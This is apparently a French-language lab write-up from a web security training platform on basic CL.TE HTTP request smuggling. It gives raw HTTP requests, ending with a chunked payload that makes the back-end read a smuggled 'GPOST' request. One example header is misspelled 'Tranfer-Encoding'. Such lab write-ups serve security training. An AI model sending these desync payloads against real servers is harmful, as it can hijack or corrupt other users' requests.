Vulnérabilité basique CL.TE

HTTP request smuggling, basic CL.TE vulnerability

Lab: HTTP request smuggling, basic CL.TE vulnerability | Web Security AcademyWebSecAcademy

Dans ce laboratoire, l’infrastructure se compose d’un serveur frontal et d’un serveur dorsal. Le serveur frontal ne prend pas en charge le chunked encoding et rejette toute requête qui n’utilise pas les méthodes GET ou POST.

L’objectif est de smuggler une requête vers le serveur back-end afin que la requête suivante interprétée par celui-ci semble utiliser la méthode GPOST.

Remarque : Même si le laboratoire accepte HTTP/2, la technique nécessaire repose exclusivement sur HTTP/1. Il faut donc changer manuellement le protocole dans Burp Repeater via la section Request attributes de l’Inspector.

Astuce : Manipuler manuellement les longueurs dans une attaque de request smuggling peut être complexe. L’extension Burp HTTP Request Smuggler, disponible dans le BApp Store, peut faciliter cette tâche.

Exemple valide observé

La requête suivante est acceptée :

POST / HTTP/1.1

Host: 0acc00e204b4e3ae81f82028009c00eb.web-security-academy.net

Content-Length: 13

Tranfer-Encoding: chunked



3

abc

0

Erreur en modifiant la taille finale

Si l’on remplace le 0 terminal par un caractère invalide (ex. : X), le serveur signale une erreur :

3

abc

X

Ajout du caractère final pour injecter `G`

En plaçant un G après le chunk final, on peut préparer la requête smuggled destinée au back-end :

POST / HTTP/1.1

Host: 0acc00e204b4e3ae81f82028009c00eb.web-security-academy.net

Connection: keep-alive

Content-Type: application/x-www-form-urlencoded

Content-Length: 6

Transfer-Encoding: chunked



0



G

Mis à jour il y a 11 jours

Ce contenu vous a-t-il été utile ?

HTTP request smuggling, basic CL.TE vulnerability

Exemple valide observé

Erreur en modifiant la taille finale

Ajout du caractère final pour injecter G

Ajout du caractère final pour injecter `G`